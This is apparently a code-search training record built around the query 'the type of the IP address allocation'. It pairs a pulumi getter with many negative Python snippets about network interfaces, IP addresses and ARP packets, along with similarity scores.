"def name(self):\n # self._name = \"wyzeapi_\"+self._device_mac+\"_\"+ self._name\n return self._device.nickname",
"def nw_name(self):\n return self._nw_name",
"def _iface_type(self, if_name):\n\n if if_name.lower().startswith('gi'):\n if_type = 'GigabitEthernet'\n elif if_name.lower().startswith('ten'):\n if_type = 'Ten-GigabitEthernet'\n elif if_name.lower().startswith('fo'):\n if_type = 'FortyGigE'\n elif if_name.lower().startswith('vl'):\n if_type = 'Vlan-interface'\n elif if_name.lower().startswith('lo'):\n if_type = 'LoopBack'\n elif if_name.lower().startswith('br'):\n if_type = 'Bridge-Aggregation'\n elif if_name.lower().startswith('ro'):\n if_type = 'Route-Aggregation'\n elif if_name.lower().startswith('tu'):\n if_type = 'Tunnel'\n elif if_name.lower().startswith('tw'):\n if_type = 'TwentyGigE'\n elif if_name.lower().startswith('hu'):\n if_type = 'HundredGigE'\n else:\n if_type = None\n\n number_list = if_name.split(' ')\n if len(number_list) == 2:\n number = number_list[-1].strip()\n else:\n number = self._get_number(if_name)\n\n if if_type:\n proper_interface = if_type + number\n else:\n proper_interface = if_name\n\n return proper_interface, if_type",
"def renameIface(self, station, nextWlan, iface):\n iface = iface[:-1]\n station.cmd('ip link set dev %s name %s-wlan%s' % (iface, station, nextWlan))\n station.cmd('ifconfig %s-wlan%s up' % (station, nextWlan))",
"def Name(self, default=None):\n return self.data.get('name', default)",
"def default_namespace(self) -> Optional[str]:\n return self.schema.namespaces.get('')",
"def get_network_name(options):\n user = pwd.getpwuid(os.getuid())[0]\n return \"%s-%s\" %(user, options.name)",
"def default_docker_pull_conn_name(self) -> str:\n return self._default_docker_pull_conn_name",
"def get_network(self) -> Optional[str]:\n return self.get_value(self._network_attribute)",
"def __str__(self):\n \n return self.net.ifconfig()",
"def interface(self):\n\n data = ['[Interface]']\n for item in INTERFACE_KEYS:\n value = getattr(self, item, None)\n if value:\n data.append(value)\n\n return '''\n'''.join(data)",
"def name(self):\n if self._name is None:\n return(self.default_name)\n else:\n return(self._name)",
"def name(self):\n if self.resource.is_client:\n return f\"{self.network.name} {self.resource.name_connection_type} {SWITCH_TYPES[self.variable][0]}\"\n elif self.resource.is_eero or self.resource.is_profile:\n return f\"{self.network.name} {self.resource.name} {SWITCH_TYPES[self.variable][0]}\"\n return f\"{self.resource.name} {SWITCH_TYPES[self.variable][0]}\"",
"def _set_interface_name(self, v, load=False):\n if hasattr(v, \"_utype\"):\n v = v._utype(v)\n try:\n t = YANGDynClass(v,base=[RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((([0-9]|[1][0-6]))/([1-9]|[1-9][0-9]|[1-9][0-9][0-9])(:[1-4])?)', 'length': [u'3..16']}),RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..512']}),RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..4090']}),], is_leaf=True, yang_name=\"interface-name\", rest_name=\"interface-name\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions={u'tailf-common': {u'info': u'The Interface value.'}}, namespace='urn:brocade.com:mgmt:brocade-fcoe-ext', defining_module='brocade-fcoe-ext', yang_type='union', is_config=True)\n except (TypeError, ValueError):\n raise ValueError({\n 'error-string': \"\"\"interface_name must be of a type compatible with union\"\"\",\n 'defined-type': \"brocade-fcoe-ext:union\",\n 'generated-type': \"\"\"YANGDynClass(base=[RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((([0-9]|[1][0-6]))/([1-9]|[1-9][0-9]|[1-9][0-9][0-9])(:[1-4])?)', 'length': [u'3..16']}),RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..512']}),RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..4090']}),], is_leaf=True, yang_name=\"interface-name\", rest_name=\"interface-name\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions={u'tailf-common': {u'info': u'The Interface value.'}}, namespace='urn:brocade.com:mgmt:brocade-fcoe-ext', defining_module='brocade-fcoe-ext', yang_type='union', is_config=True)\"\"\",\n })\n\n self.__interface_name = t\n if hasattr(self, '_set'):\n self._set()",
"def network(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"network\")",
"def name(self):\n return self._imu.IMUName()",
"def setDefaultNS(self, ns):\n self.default_ns = ns",
"def _get_ifname(self):\n return self.__ifname",
"def GetDefaultWiredNetwork(self):\n config = ConfigParser.ConfigParser()\n config.read(self.wired_conf)\n profileList = config.sections()\n for profile in profileList:\n if config.has_option(profile, \"default\"):\n if misc.to_bool(config.get(profile, \"default\")):\n return profile\n return None",
"def get_name():\n\n return 'nettools'",
"def get_default_namespace(self):\n return None",
"def name(self) -> str:\n return self._alias or f\"Nut-{self._host}\"",
"def layer_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"layer_name\")",
"def get_ipv4_defaultgw(self):\n \n ipv4_defaultgw = self._dhcp_client_ctrl.getIpv4DefaultGateway()\n if ipv4_defaultgw is None:\n return None\n else:\n return unicode(ipv4_defaultgw)",
"def create_default_network(context):\n return [{\n 'type': 'templates/network.py',\n 'name': 'fc-network',\n 'properties': {\n 'resourceName': 'network',\n 'name': 'network',\n 'projectId': '$(ref.fc-project.projectId)',\n 'autoCreateSubnetworks': True,\n # We pass the dependsOn list into the network template as a\n # parameter. Deployment Manager doesn't support dependsOn for\n # template-call nodes, so we can't have this resource itself depend on\n # the project-wide resources.\n 'dependsOn': '$(ref.fc-project.resourceNames)',\n },\n }]",
"def default_docker_pull_conn_name(self, default_docker_pull_conn_name: str):\n\n self._default_docker_pull_conn_name = default_docker_pull_conn_name",
"def LegacyName(self, default=None):\n return self.data.get('legacy_name', default)",
"def virtual_network_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"virtual_network_id\")",
"def default_prefix(self) -> str:\n return \"\"",
"def default_prefix(self) -> str:\n return \"\"",
"def DetectWirelessInterface(self):\n iface = self.wifi.DetectWirelessInterface()\n if iface:\n print 'Automatically detected wireless interface ' + iface\n else:\n print \"Couldn't detect a wireless interface.\"\n return str(iface)",
"def iface_config(self, iface, *args, **kwargs):\n if not set(kwargs).issubset({'intf_ip_addr', 'netns', 'adminMode'}):\n raise NotImplementedError(\"Method is not implemented for current kwargs.\")\n if kwargs.get('netns', False):\n # Create network namespaces for current iface\n self.create_namespaces(iface)\n del kwargs['netns']\n if 'intf_ip_addr' in kwargs:\n kwargs['ipAddr'] = \"{}/24\".format(kwargs['intf_ip_addr'])\n if iface in self.namespaces:\n self._lhost.ui.enter_namespace(self.namespaces[iface])\n self._lhost.ui.modify_ports([iface], **kwargs)\n if iface in self.namespaces:\n self._lhost.ui.exit_namespace()",
"def guess_nic_name(self, nic_number):\n if nic_number == 1:\n return \"mgmt0\"\n else:\n return (\"Ethernet{0}/{1}\".format((nic_number - 2) // 48 + 2,\n (nic_number - 2) % 48 + 1))",
"def identity(self, default=\"\"):\n for prop in (\"standard_name\", \"grid_mapping_name\"):\n n = self.coordinate_conversion.get_parameter(prop, None)\n if n is not None:\n return f\"{prop}:{n}\"\n\n n = self.nc_get_variable(None)\n if n is not None:\n return f\"ncvar%{n}\"\n\n return default",
"def fortran_interface(self) -> str:\n return ''",
"def get_default(self, create=True):\n if self._default_network is None and create:\n log.debug(\"Creating default network...\")\n self._default_network = self.create('default', driver='bridge')\n\n return self._default_network",
"def interface(self):\n if self._interface is None:\n expression = expressions.WPA_INTERFACE\n name = expressions.INTERFACE_NAME\n command = self.interface_list_command\n self._interface = self._match(expression,\n name,\n command)\n return self._interface",
"def GetCurrentNetwork(self, iwconfig=None):\n current_network = str(self.wifi.GetCurrentNetwork(iwconfig))\n return current_network",
"def default_endpoint(self) -> str:\n return self.settings[\"default_endpoint\"]",
"def computer_network_name(self, computer_network_name: str):\n self._computer_network_name = computer_network_name",
"def subnetwork_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"subnetwork_name\")",
"def get_network(self):\n return self.get_ip_network()[-1]",
"def core_network_attachment_arn(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"core_network_attachment_arn\")",
"def layer_protocol_name(self) -> str:\n return self._layer_protocol_name"
] | [
"0.6839024",
"0.67300063",
"0.6576439",
"0.6536506",
"0.63453054",
"0.62927467",
"0.6252902",
"0.6176393",
"0.6155957",
"0.6108241",
"0.61039215",
"0.60497546",
"0.5955052",
"0.5913382",
"0.5868023",
"0.5867791",
"0.586413",
"0.58365524",
"0.583649",
"0.58314383",
"0.58273387",
"0.58186436",
"0.58046484",
"0.5784699",
"0.5776711",
"0.5720125",
"0.5647284",
"0.5640018",
"0.5637313",
"0.56305647",
"0.561889",
"0.55938256",
"0.558493",
"0.55829823",
"0.5571122",
"0.5567466",
"0.5529212",
"0.5500438",
"0.5496911",
"0.5494055",
"0.548975",
"0.5480558",
"0.5475745",
"0.5456404",
"0.54428256",
"0.54394114",
"0.54204065",
"0.5420172",
"0.54072",
"0.5398958",
"0.5346724",
"0.5340946",
"0.53397155",
"0.53397155",
"0.53397155",
"0.5327861",
"0.5306521",
"0.530602",
"0.53027636",
"0.5287903",
"0.52813387",
"0.5268927",
"0.52682924",
"0.52601707",
"0.5256893",
"0.52551824",
"0.52494943",
"0.524617",
"0.5245409",
"0.52449393",
"0.5243843",
"0.523603",
"0.5222033",
"0.52203584",
"0.5213849",
"0.52113366",
"0.52052987",
"0.51949984",
"0.5178461",
"0.5178444",
"0.5177552",
"0.51700914",
"0.51669854",
"0.51565826",
"0.51543015",
"0.51543015",
"0.5149277",
"0.5148701",
"0.51458824",
"0.5141578",
"0.51363873",
"0.512817",
"0.512609",
"0.5125175",
"0.51077056",
"0.51021224",
"0.5094554",
"0.5089065",
"0.5086891",
"0.50731915"
] | 0.67675763 | 1 |
The type of the IP address allocation, which defaults to "DualStack". | def ip_allocation_type(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "ip_allocation_type") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def _get_address_type(self):\n return self.__address_type",
"def get_ip_type1(self) -> str:\n hex_ip = hexlify(self.message)[152:160]\n ip_addr = int(hex_ip[6:8] + hex_ip[4:6] + hex_ip[2:4] + hex_ip[0:2], 16)\n return inet_ntoa(pack(\"<L\", ip_addr))",
"def address_type(self) -> str:\n return pulumi.get(self, \"address_type\")",
"def get_ip_type2(self) -> str:\n hex_ip = hexlify(self.message)[154:162]\n ip_addr = int(hex_ip[0:2] + hex_ip[2:4] + hex_ip[4:6] + hex_ip[6:8], 16)\n return inet_ntoa(pack(\">L\", ip_addr))",
"def ip_type(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"ip_type\")",
"def ip_allocation_type(self) -> Optional[pulumi.Input[Union[str, 'IpAllocationType']]]:\n return pulumi.get(self, \"ip_allocation_type\")",
"def ip_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_type\")",
"def address_type(self):\n return addresser.AddressSpace.PROPOSALS",
"def type(self):\n return BipType.get_at(self.ea)",
"def get_network_type(self):\n net_type = self._data['type']\n if net_type == 'Shared':\n return 'guest'\n elif net_type == 'Isolated':\n return 'isolated'",
"def allocate_subnet(self):\n if len(self.subnet_list) == 0:\n subnet = '192.168.1.0/24'\n self.subnet_list.append(subnet)\n return subnet\n else:\n subnet = self.subnet_list[::-1][0]\n ip = ipaddress.IPv4Network(subnet)[0]\n s = ipaddress.IPv4Address(ip) + 256\n return '{}{}'.format(s, '/24')",
"def test_external_ip_get_kind(self):\n assert_equal(self.test_external_ip.get_kind(), 'mpexternalip')",
"def AddrType(self) -> AddrTypes:\n return self.m_addr_type",
"def get_network_type(self):\n\t\treturn call_sdk_function('PrlVirtNet_GetNetworkType', self.handle)",
"def SocketType(self) -> SocketType:",
"def ip_protocol(self) -> str:\n protocol = f\"ipv{self.ip_address.version}\"\n\n log.debug(\"Host %s: IP protocol for paramiko is %s.\", self.host)\n return protocol",
"def get_type(self):\n types = dict(ADDRESS_TYPE_CHOICES)\n return types.get(self.address_type, \"N/A\")",
"def _address_type(self, address):\n parsed_type = None\n parsed = urlparse.urlparse(address)\n if parsed.scheme not in ('http', 'https', 'ipc', 'tcp'):\n raise ValueError('Invalid volttron central address.')\n\n return parsed.scheme",
"def outside_ip_address_type(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"outside_ip_address_type\")",
"def get_ip_version(network):\r\n if netaddr.IPNetwork(network).version == 6:\r\n return \"IPv6\"\r\n elif netaddr.IPNetwork(network).version == 4:\r\n return \"IPv4\"",
"def _get_network_type(self):\n return collections.namedtuple('hyper_dqn_network',\n ['hyp_q_value', 'q_values'])",
"def __ip_protocol(self, proto_num):\n if proto_num in self.protocols:\n return self.protocols[proto_num]\n return str(proto_num)",
"def ip_allocation_method(self) -> pulumi.Input[Union[str, 'VirtualMachineIPAllocationMethod']]:\n return pulumi.get(self, \"ip_allocation_method\")",
"def get_ip_version(network):\n if netaddr.IPNetwork(network).version == 6:\n return \"IPv6\"\n elif netaddr.IPNetwork(network).version == 4:\n return \"IPv4\"",
"def address(self):\n \n return self.__ip",
"def ip_protocol(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"ip_protocol\")",
"def outside_ip_address_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"outside_ip_address_type\")",
"def outside_ip_address_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"outside_ip_address_type\")",
"def ip_protocol(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"ip_protocol\")",
"def pkt_type(self):\n return uint16_packer.unpack(self[32:34])[0]",
"def get_net_adapter_type(self):\n\t\treturn call_sdk_function('PrlSrvCfgNet_GetNetAdapterType', self.handle)",
"def is_ip(self) -> bool:\n return self.typ == ETH_P_IP",
"def getnetwork(ipaddr):\n return '192.168.1.0/24'",
"def get_name(self):\n \n return 'Socket/IP'",
"def _read_proto_resolve(self, addr: 'bytes', ptype: 'int') -> 'str | IPv4Address | IPv6Address':\n if ptype == Enum_EtherType.Internet_Protocol_version_4: # IPv4\n return ipaddress.ip_address(addr)\n if ptype == Enum_EtherType.Internet_Protocol_version_6: # IPv6\n return ipaddress.ip_address(addr)\n return addr.hex()",
"def getTransportType(self):\n if type(self.segment) is TcpSegment:\n return TCP_ID\n elif type(self.segment) is UdpSegment:\n return UDP_ID\n else:\n raise Exception(\"Unexpected type of transport protocol!\")",
"def _make_proto_resolve(self, addr: 'IPv4Address | IPv6Address | str | bytes', ptype: 'int') -> 'bytes':\n if ptype == Enum_EtherType.Internet_Protocol_version_4:\n return ipaddress.IPv4Address(addr).packed\n if ptype == Enum_EtherType.Internet_Protocol_version_6:\n return ipaddress.IPv6Address(addr).packed\n\n if isinstance(addr, str):\n return addr.encode()\n if isinstance(addr, (ipaddress.IPv4Address, ipaddress.IPv6Address)):\n return addr.packed\n return addr",
"def type(self):\n return self.sock.type",
"def ip_protocol(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_protocol\")",
"def get_ip(self):",
"def pack_ip(self, str_ip):\n return struct.pack(\">BBBB\", *[ int(c) for c in str_ip.split(\".\") ])",
"def getAddress(self) -> int:\n ...",
"def AioMessageTypeToIpAddressString(message_type):\n ip = network_config.AioMessageTypeToIpAddress(message_type)\n return '%d.%d.%d.%d' % (ip.a, ip.b, ip.c, ip.d)",
"def get_packet_type(cls, type_):\n if type_ <= ether.ETH_TYPE_IEEE802_3:\n type_ = ether.ETH_TYPE_IEEE802_3\n return cls._TYPES.get(type_)",
"def __init__(self):\n self.id = None\n self.typeInfo['id'] = 'string'\n \"\"\"availability of the network offering\"\"\"\n self.availability = None\n self.typeInfo['availability'] = 'string'\n \"\"\"true if network offering is ip conserve mode enabled\"\"\"\n self.conservemode = None\n self.typeInfo['conservemode'] = 'boolean'\n \"\"\"the date this network offering was created\"\"\"\n self.created = None\n self.typeInfo['created'] = 'date'\n \"\"\"additional key/value details tied with network offering\"\"\"\n self.details = None\n self.typeInfo['details'] = 'map'\n \"\"\"an alternate display text of the network offering.\"\"\"\n self.displaytext = None\n self.typeInfo['displaytext'] = 'string'\n \"\"\"true if guest network default egress policy is allow; false if default egress policy is deny\"\"\"\n self.egressdefaultpolicy = None\n self.typeInfo['egressdefaultpolicy'] = 'boolean'\n \"\"\"true if network offering can be used by VPC networks only\"\"\"\n self.forvpc = None\n self.typeInfo['forvpc'] = 'boolean'\n \"\"\"guest type of the network offering, can be Shared or Isolated\"\"\"\n self.guestiptype = None\n self.typeInfo['guestiptype'] = 'string'\n \"\"\"true if network offering is default, false otherwise\"\"\"\n self.isdefault = None\n self.typeInfo['isdefault'] = 'boolean'\n \"\"\"true if network offering supports persistent networks, false otherwise\"\"\"\n self.ispersistent = None\n self.typeInfo['ispersistent'] = 'boolean'\n \"\"\"maximum number of concurrents connections to be handled by lb\"\"\"\n self.maxconnections = None\n self.typeInfo['maxconnections'] = 'integer'\n \"\"\"the name of the network offering\"\"\"\n self.name = None\n self.typeInfo['name'] = 'string'\n \"\"\"data transfer rate in megabits per second allowed.\"\"\"\n self.networkrate = None\n self.typeInfo['networkrate'] = 'integer'\n \"\"\"the ID of the secondary service offering used by virtual router provider\"\"\"\n self.secondaryserviceofferingid = None\n self.typeInfo['secondaryserviceofferingid'] = 'string'\n \"\"\"the name of the secondary service offering used by virtual router provider\"\"\"\n self.secondaryserviceofferingname = None\n self.typeInfo['secondaryserviceofferingname'] = 'string'\n \"\"\"the ID of the service offering used by virtual router provider\"\"\"\n self.serviceofferingid = None\n self.typeInfo['serviceofferingid'] = 'string'\n \"\"\"the name of the service offering used by virtual router provider\"\"\"\n self.serviceofferingname = None\n self.typeInfo['serviceofferingname'] = 'string'\n \"\"\"true if network offering supports specifying ip ranges, false otherwise\"\"\"\n self.specifyipranges = None\n self.typeInfo['specifyipranges'] = 'boolean'\n \"\"\"true if network offering supports vlans, false otherwise\"\"\"\n self.specifyvlan = None\n self.typeInfo['specifyvlan'] = 'boolean'\n \"\"\"state of the network offering. Can be Disabled/Enabled/Inactive\"\"\"\n self.state = None\n self.typeInfo['state'] = 'string'\n \"\"\"true if network offering supports network that span multiple zones\"\"\"\n self.supportsstrechedl2subnet = None\n self.typeInfo['supportsstrechedl2subnet'] = 'boolean'\n \"\"\"the tags for the network offering\"\"\"\n self.tags = None\n self.typeInfo['tags'] = 'string'\n \"\"\"the traffic type for the network offering, supported types are Public, Management, Control, Guest, Vlan or Storage.\"\"\"\n self.traffictype = None\n self.typeInfo['traffictype'] = 'string'\n \"\"\"the list of supported services\"\"\"\n self.service = []",
"def ip_info():\n return str(getIP())",
"def block_override_dns_type(self) -> str:\n return pulumi.get(self, \"block_override_dns_type\")",
"def IpNetwork(address, version=None):\n\n if version:\n if version == 4:\n return Ipv4Network(address)\n elif version == 6:\n return Ipv6Network(address)\n\n try:\n return Ipv4Network(address)\n except (ValueError):\n pass\n\n try:\n return Ipv6Network(address)\n except (ValueError):\n pass\n\n raise ValueError('%r does not appear to be an IPv4 or IPv6 network' % address)",
"def source_type(self):\n return SOURCE_TYPE_ROUTER",
"def source_type(self):\n return SOURCE_TYPE_ROUTER",
"def address(self):\n return f\"{self._type}.{self._id}\"",
"def get_allocated_address(\n self, config: ActorPoolConfig, allocated: allocated_type\n ) -> str:",
"def OSSupportsIPv4(self) -> bool:",
"def make(self, *,\n htype: 'Enum_Hardware | StdlibEnum | AenumEnum | str | int' = Enum_Hardware.Ethernet,\n htype_default: 'Optional[int]' = None,\n htype_namespace: 'Optional[dict[str, int] | dict[int, str] | Type[StdlibEnum] | Type[AenumEnum]]' = None, # pylint: disable=line-too-long\n htype_reversed: 'bool' = False,\n ptype: 'Enum_EtherType | StdlibEnum | AenumEnum | str | int' = Enum_EtherType.Internet_Protocol_version_4,\n ptype_default: 'Optional[int]' = None,\n ptype_namespace: 'Optional[dict[str, int] | dict[int, str] | Type[StdlibEnum] | Type[AenumEnum]]' = None, # pylint: disable=line-too-long\n ptype_reversed: 'bool' = False,\n hlen: 'int' = 6,\n plen: 'int' = 4,\n oper: 'Enum_Operation | StdlibEnum | AenumEnum | str | int' = Enum_Operation.REQUEST,\n oper_default: 'Optional[int]' = None,\n oper_namespace: 'Optional[dict[str, int] | dict[int, str] | Type[StdlibEnum] | Type[AenumEnum]]' = None, # pylint: disable=line-too-long\n oper_reversed: 'bool' = False,\n sha: 'str | bytes | bytearray' = '00:00:00:00:00:00',\n spa: 'IPv4Address | IPv6Address | str | bytes | bytearray' = '0.0.0.0', # nosec: B104\n tha: 'str | bytes | bytearray' = '00:00:00:00:00:00',\n tpa: 'IPv4Address | IPv6Address | str | bytes | bytearray' = '0.0.0.0', # nosec: B104\n payload: 'bytes | Protocol | Schema' = b'',\n **kwargs: 'Any') -> 'Schema_ARP':\n _htype = self._make_index(htype, htype_default, namespace=htype_namespace,\n reversed=htype_reversed, pack=False)\n _ptype = self._make_index(ptype, ptype_default, namespace=ptype_namespace,\n reversed=ptype_reversed, pack=False)\n _oper = self._make_index(oper, oper_default, namespace=oper_namespace,\n reversed=oper_reversed, pack=False)\n\n return Schema_ARP(\n htype=_htype,\n ptype=_ptype,\n hlen=hlen,\n plen=plen,\n oper=_oper,\n sha=self._make_addr_resolve(sha, _htype),\n spa=self._make_proto_resolve(spa, _ptype),\n tha=self._make_addr_resolve(tha, _htype),\n tpa=self._make_proto_resolve(tpa, _ptype),\n payload=payload,\n )",
"def get_ip_freebind(self):\n if hasattr(socket, \"IP_FREEBIND\"):\n # Valid distribution\n return socket.IP_FREEBIND\n if sys.platform == \"linux2\":\n return 15\n return None",
"def device_type(self) -> str:\n return \"urn:schemas-upnp-org:device:InternetGatewayDevice:1\"",
"def addressing(self) -> Optional[AddressingType]: # pylint: disable=unsubscriptable-object\n return self.pdu_sequence[0].addressing if self.pdu_sequence else None",
"def get_ip_address(self):\n raise NotImplementedError",
"def Address(self) -> _n_5_t_0:",
"def get_preferred_ip(self, ip_type: IPTypes) -> str:\n if ip_type.value in self.ip_addrs:\n return self.ip_addrs[ip_type.value]\n raise CloudSQLIPTypeError(\n \"Cloud SQL instance does not have any IP addresses matching \"\n f\"preference: {ip_type.value})\"\n )",
"def new_ip(address):\n return IPy.IP(address)",
"def __init__(self) -> None:\n self.ip_address: str | None = None",
"def get_type(network: ipaddress.ip_network) -> str:\n for t in TYPES:\n if getattr(network, f\"is_{t}\"):\n return t",
"def ipv4(self):\n return Network(private=True).ipv4",
"def __index__(cls) -> 'Enum_EtherType': # pylint: disable=invalid-index-returned\n return Enum_EtherType.Address_Resolution_Protocol # type: ignore[return-value]",
"def address(self):\n return \"%s:%s\" % (self.ip, self.port)",
"def _get_network_type(self, host):\n network_type = host.get(\"network\")\n default_network = self.config.get(\"default_network\")\n if network_type is None:\n network_type = self._metadata.get(\"network\", default_network)\n if not network_type:\n raise ProvisioningConfigError(\n \"No network type specified and project doesn't have default \"\n \"network type (property 'default_network') specified in \"\n \"provisioning config.\"\n )\n return network_type",
"def __detect_type__(self, value):\n def is_ipv6_address(value):\n try:\n value, interface = value.split('%', 1)\n except: # noqa\n pass\n try:\n parts = value.split(':')\n for part in parts:\n if part == '':\n continue\n part = int(part, 16)\n if part < 0:\n raise ValueError\n return True\n except Exception:\n return False\n\n def is_ipv4_address(value):\n try:\n value, interface = value.split('%', 1)\n except: # noqa\n pass\n try:\n parts = value.split('.', 3)\n for part in parts:\n part = int(part)\n if part < 0 or part > 255:\n raise ValueError\n return True\n except: # noqa\n return False\n\n # Strip port\n if value.startswith('['):\n value = value[1:]\n try:\n value, port = value.split(':', 1)\n except: # noqa\n pass\n\n if value.endswith(']'):\n value = value[:-1]\n\n if is_ipv4_address(value):\n return 1, value, 'ipv4_address'\n\n elif is_ipv6_address(value):\n return 2, value, 'ipv6_address'\n\n else:\n return 0, value, 'hostname'",
"def get_ip_string():\n return netifaces.ifaddresses('br0')[netifaces.AF_INET][0]['addr']",
"def address(self):\n if self.con_strategy == \"local\":\n return self.address_local()\n if self.con_strategy == \"remote\":\n return self.address_remote()\n return None",
"def source_type(self) -> SourceType:\n return SourceType.ROUTER",
"def source_type(self) -> SourceType:\n return SourceType.ROUTER",
"def source_type(self) -> SourceType:\n return SourceType.ROUTER",
"def __init__(\n self, name: str = \"\", protocol: int | None = None, **kwargs: Any\n ) -> None:\n\n super().__init__(name=name, **kwargs)\n\n if protocol not in [None, 4, 6]:\n raise ValueError(\"IpAddress protocol needs to be either 4, 6 or None\")\n self.protocol = protocol",
"def _get_protocol_type(self):\n return self.__protocol_type",
"def __ip2intstr(self, address):\n return str(struct.unpack('!I', address)[0])",
"def new_ip(address):\n return ipaddress.IPv4Address(address)",
"def LocalAddress(self) -> _n_5_t_0:",
"def __init__(self, address, type,):\n self.address = address\n self.type = type",
"def _is_network_type(self, name):\n nt = self.config[\"networks\"].get(name)\n return bool(nt)",
"def get_primary_ip(options, index):\n\n second_octet = 160 + index\n return \"192.%s.1.1\" % second_octet",
"def __init__(\n self, name: str = \"\", protocol: int | None = None, **kwargs: Any\n ) -> None:\n\n super().__init__(name=name, **kwargs)\n if not ipaddress:\n raise SoftDependencyError(\"ipaddress\")\n if protocol not in [None, 4, 6]:\n raise ValueError(\"IpAddress protocol needs to be either 4, 6 or None\")\n self.protocol = protocol",
"def to_python(self, value):\n if isinstance(value, (ipaddress.IPv4Network, ipaddress.IPv6Network)):\n return value\n\n if value is None:\n return value\n\n try:\n return ipaddress.ip_network(value)\n except ValueError:\n raise ValidationError(_(\"Invalid input for an IP network.\"))",
"def ipAddress():\n \n sk = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sk.connect((\"8.8.8.8\", 80))\n ip = (sk.getsockname()[0])\n sk.close()\n return str(ip)",
"def test_create_host_subnet(self):\n pass",
"def get_address(self):\r\n return \"iDigi\"",
"def address_family(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"address_family\")",
"def app_network_access_type(self) -> Optional[pulumi.Input['DomainAppNetworkAccessType']]:\n return pulumi.get(self, \"app_network_access_type\")",
"def guess_network(self):\n # decide what sort of network we are going to use\n # return the actual type\n # right now we just use the first host only network and that's it\n host_only = list(HostOnlyNetwork.find_networks())\n if host_only:\n return host_only[0]\n else:\n return NewHostOnlyNetwork()",
"def SupportsIPv4(self) -> bool:",
"def getIp(self):\n raise NotImplementedError",
"def adjust_ip (self, ip=None):\n if ip != None and ip.haslayer(IP):\n if (self.type == 0x11):\n if (self.gaddr == \"0.0.0.0\"):\n ip.dst = \"224.0.0.1\" # IP rule 1\n retCode = True \n elif isValidMCAddr(self.gaddr):\n ip.dst = self.gaddr # IP rule 3a\n retCode = True\n else:\n print \"Warning: Using invalid Group Address\"\n retCode = False\n elif ((self.type == 0x17) and isValidMCAddr(self.gaddr)):\n ip.dst = \"224.0.0.2\" # IP rule 2\n retCode = True\n elif ((self.type == 0x12) or (self.type == 0x16)) and (isValidMCAddr(self.gaddr)):\n ip.dst = self.gaddr # IP rule 3b\n retCode = True\n else:\n print \"Warning: Using invalid IGMP Type\"\n retCode = False\n else:\n print \"Warning: No IGMP Group Address set\"\n retCode = False\n if retCode == True:\n ip.ttl=1 # IP Rule 4\n ip.options=[IPOption_Router_Alert()] # IP rule 5\n return retCode",
"def is_on_stack(self, address):\n return self.is_address_of_type(address, MemoryType.Stack)",
"def buildProtocol(addr):",
"def type(self) -> Optional[pulumi.Input[Union[str, 'AgentPoolType']]]:\n return pulumi.get(self, \"type\")",
"def server_type(self):\n ...",
"def app_network_access_type(self) -> pulumi.Output[Optional['DomainAppNetworkAccessType']]:\n return pulumi.get(self, \"app_network_access_type\")",
"def get_network_allocations_number(self):\r\n LOG.debug(\"Get network allocations number.\")\r\n return constants.IP_ALLOCATIONS",
"def allocate_address():\n response = EC2.allocate_address(\n )\n return response",
"def __str__(self):\n return \"{}\".format(visiteur.ip)"
] | [
"0.6558105",
"0.6343783",
"0.62579095",
"0.6204035",
"0.61733663",
"0.60764885",
"0.60489833",
"0.6027968",
"0.590761",
"0.5870783",
"0.57298845",
"0.5710156",
"0.569875",
"0.5694414",
"0.5689083",
"0.5678903",
"0.5581792",
"0.5554217",
"0.5541468",
"0.55387825",
"0.5525745",
"0.55044353",
"0.55011237",
"0.5486684",
"0.5449133",
"0.5444622",
"0.54439265",
"0.54439265",
"0.5438365",
"0.5434098",
"0.54337263",
"0.54220146",
"0.54215086",
"0.5400311",
"0.53990924",
"0.53750294",
"0.53706646",
"0.5356622",
"0.53405666",
"0.5335872",
"0.5334917",
"0.53232276",
"0.5311669",
"0.5299823",
"0.5293537",
"0.5280677",
"0.5266033",
"0.5264635",
"0.52623934",
"0.52623934",
"0.5261298",
"0.5239982",
"0.52353704",
"0.5234466",
"0.5227017",
"0.52248585",
"0.52146244",
"0.52139854",
"0.52075285",
"0.51957333",
"0.5188182",
"0.5170947",
"0.516927",
"0.51688737",
"0.5168697",
"0.5167536",
"0.51347405",
"0.5131819",
"0.5124529",
"0.51238346",
"0.5104629",
"0.5104629",
"0.5104629",
"0.5102564",
"0.5093965",
"0.5091164",
"0.50869805",
"0.50857097",
"0.5078986",
"0.50723845",
"0.5067969",
"0.5061323",
"0.5042722",
"0.5033845",
"0.50227296",
"0.50064415",
"0.49977282",
"0.4990625",
"0.49844098",
"0.49809164",
"0.49645197",
"0.4952559",
"0.49496102",
"0.4946586",
"0.49462265",
"0.49414185",
"0.49401394",
"0.4938156",
"0.49322572",
"0.49314168"
